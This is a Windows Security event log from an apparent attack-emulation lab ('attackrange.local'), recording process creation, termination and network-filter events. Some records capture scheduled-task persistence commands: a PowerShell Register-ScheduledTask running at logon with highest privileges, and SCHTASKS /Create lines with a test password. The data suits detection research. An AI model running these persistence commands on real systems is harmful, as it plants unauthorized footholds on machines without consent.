Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278910
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1d0c
New Process Name: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\2\qupsc0xs\qupsc0xs.cmdline"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278909
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1e54
Process Name: C:\Windows\System32\whoami.exe
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278908
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1e54
New Process Name: C:\Windows\System32\whoami.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\whoami.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278907
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x560
Process Name: C:\Windows\System32\HOSTNAME.EXE
Exit Status: 0x0
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278906
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x560
New Process Name: C:\Windows\System32\HOSTNAME.EXE
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\HOSTNAME.EXE"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887278
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53902
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887277
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 53446
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887276
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x189c
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:27:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887275
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x189c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278946
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x16e0
Process Name: C:\Windows\System32\TSTheme.exe
Exit Status: 0x0
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278945
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x370
New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$Action = New-ScheduledTaskAction -Execute \""calc.exe\""
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId \""BUILTIN\Administrators\"" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object}
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278944
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xe08
Process Name: C:\Windows\System32\cmd.exe
Exit Status: 0x1
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278943
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1438
Process Name: C:\Windows\System32\schtasks.exe
Exit Status: 0x1
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278942
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 628
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53923
Destination Address: 10.0.1.14
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278941
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 628
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53922
Destination Address: 10.0.1.14
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278940
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 628
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53447
Destination Address: 10.0.1.14
Destination Port: 389
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278939
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 628
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 53447
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278938
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 53921
Destination Address: ::1
Destination Port: 49686
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278937
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5176
Application Name: \device\harddiskvolume1\windows\system32\schtasks.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 53921
Destination Address: ::1
Destination Port: 49686
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278936
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 5176
Application Name: \device\harddiskvolume1\windows\system32\schtasks.exe
Network Information:
Source Address: ::
Source Port: 53921
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278935
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 792
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 53920
Destination Address: ::1
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278934
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5176
Application Name: \device\harddiskvolume1\windows\system32\schtasks.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 53920
Destination Address: ::1
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278933
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 5176
Application Name: \device\harddiskvolume1\windows\system32\schtasks.exe
Network Information:
Source Address: ::
Source Port: 53920
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278932
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1438
New Process Name: C:\Windows\System32\schtasks.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0xe08
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278931
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe08
New Process Name: C:\Windows\System32\cmd.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887284
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887283
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 53923
Destination Address: 10.0.1.14
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887282
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 904
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 53922
Destination Address: 10.0.1.14
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887281
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887280
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887279
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 53447
Destination Address: 10.0.1.14
Destination Port: 389
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278930
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53919
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278929
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x13dc
Process Name: C:\Windows\System32\cmd.exe
Exit Status: 0x0
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278928
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xd20
Process Name: C:\Windows\System32\schtasks.exe
Exit Status: 0x0
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=278927
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Task Information:
Task Name: \spawn
Task Content:
2021-04-19T18:27:53
WIN-HOST-5\Administrator
\spawn
2021-04-19T20:10:00
true
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
PT72H
7
C:\windows\system32\cmd.exe
WIN-HOST-5\Administrator
InteractiveToken
LeastPrivilege
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278926
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd20
New Process Name: C:\Windows\System32\schtasks.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x13dc
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278925
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
